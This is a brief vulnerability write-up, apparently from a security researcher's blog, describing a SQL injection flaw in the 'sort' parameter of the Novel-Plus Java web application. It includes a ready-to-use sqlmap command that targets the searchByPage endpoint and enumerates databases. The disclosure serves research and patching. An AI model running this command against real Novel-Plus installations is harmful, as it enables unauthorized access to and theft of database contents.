首页 Java Novel-Plus SQLi

Novel-Plus SQLi

孤独常伴
发布在 Java
547 0

Vulnerability describes

SQL injection is caused by string concatenation in the front end of the Novel-Plus project.

Vulnerability details

Novel-Plus SQLi-L0ne1y
Novel-Plus SQLi-L0ne1y

This is the page with normal parameters

Novel-Plus SQLi-L0ne1y

We can use SQLi in the sort argument.

Novel-Plus SQLi-L0ne1y

Attack

python2 sqlmap.py -u "http://URL/book/searchByPage?curr=1&limit=20&keyword=%25&sort=1*" --level 3 --dbs
Novel-Plus SQLi-L0ne1y

本文系作者 @ 原创发布在 L0ne1y。未经许可,禁止转载。

喜欢()
上一篇
Novel-Plus default JWT Key
下一篇
School Fees Management System Unauthorized Access
评论 (0)

请登录以参与评论。

现在登录…
相关文章
School Fees Management System Unauthorized Access
Novel-Plus default JWT Key
Novel-plus Background arbitrary file download
Lin-cms-Spring-Boot default JWT Key
热门搜索
孤独常伴
34 文章
1 评论
6 喜欢
Top